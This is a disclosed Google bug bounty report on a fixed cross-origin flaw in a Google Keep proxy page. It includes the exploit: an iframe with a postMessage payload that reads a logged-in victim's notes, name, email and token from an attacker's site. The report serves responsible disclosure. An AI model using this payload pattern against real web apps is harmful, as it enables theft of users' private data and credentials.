Skip to Content (Press Enter)
Google
Bug Hunters
XSS in https://keep-pa.clients6.google.com/static/proxy.html
Reported by:
Vinoth Kumar
Google VRP
triaged
05:18 | Feb 17, 2021
accepted
10:44 | Feb 20, 2021
fixed
08:36 | Mar 20, 2021
reward decided
$3,133.70
Steps to reproduce:
log in to your Google account
Visit
https://vinothsparrow.herokuapp.com/static/google-xss.html
This will display your email, name and your Google keep notes.
Vulnerable Url:
https://keep-pa.clients6.google.com/static/proxy.html
Vulnerable payload: JSON.stringify({"s":"makeHttpRequests","f":"..","c":1,"a":[[{"key":"gapiRequest","params":{"url":"/","path":"/","httpMethod":"GET","headers":{},"urlParams":{},"root":"keep-pa.clients6.google.com","authType":"1p"}}]],"l":false,"g":true,t:"","r":".."})
Exploit:
Add the following code to your html file to exploit
<iframe id="iframe" src="https://keep-pa.clients6.google.com/static/proxy.html?usegapi=1&parent=https://yourwebsiteorigin/"></iframe>
<script type="text/javascript">
   window.addEventListener("message",function(e) {
   // e.data contains full HTML contents of
https://keep-pa.clients6.google.com
which is a replica of
https://keep.google.com
on behalf of the logged-in user.
   }
   iframe.contenWindow.postMessage(JSON.stringify({"s":"makeHttpRequests","f":"..","c":1,"a":[[{"key":"gapiRequest","params":{"url":"/","path":"/","httpMethod":"GET","headers":{},"urlParams":{},"root":"keep-pa.clients6.google.com","authType":"1p"}}]],"l":false,"g":true,t:"","r":".."}));
</script>
Browser/OS: All
POC:
Unlisted Youtube Video:
https://youtu.be/x9sCZyB_kNQ
Attack scenario:
Using this vulnerability an attacker can get logged in users name, email, token, and notes by just victim visit the attacker-controlled website
登录
使用 Google 账号登录